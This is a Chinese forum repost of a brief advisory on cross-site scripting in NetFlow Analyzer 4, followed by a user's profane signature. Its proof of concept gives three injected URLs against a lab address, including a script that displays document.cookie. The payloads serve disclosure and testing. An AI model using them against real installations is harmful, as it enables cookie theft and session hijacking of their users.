发新话题
打印

[转载]NetFlow Analyzer 4跨站脚本漏洞以及测试方法

[转载]NetFlow Analyzer 4跨站脚本漏洞以及测试方法

文章作者:why (at) nsfocus (dot) com

I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4, with this files, sending a specially crafted url you can execute commands in the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow ... view=groups&grD
isp=<h1>test</h1>
http://192.168.10.7:8080/netflow ... view=groups&grD
isp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow ... view=groups&grD
isp=<script>alert(document.cookie)</script>
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

发新话题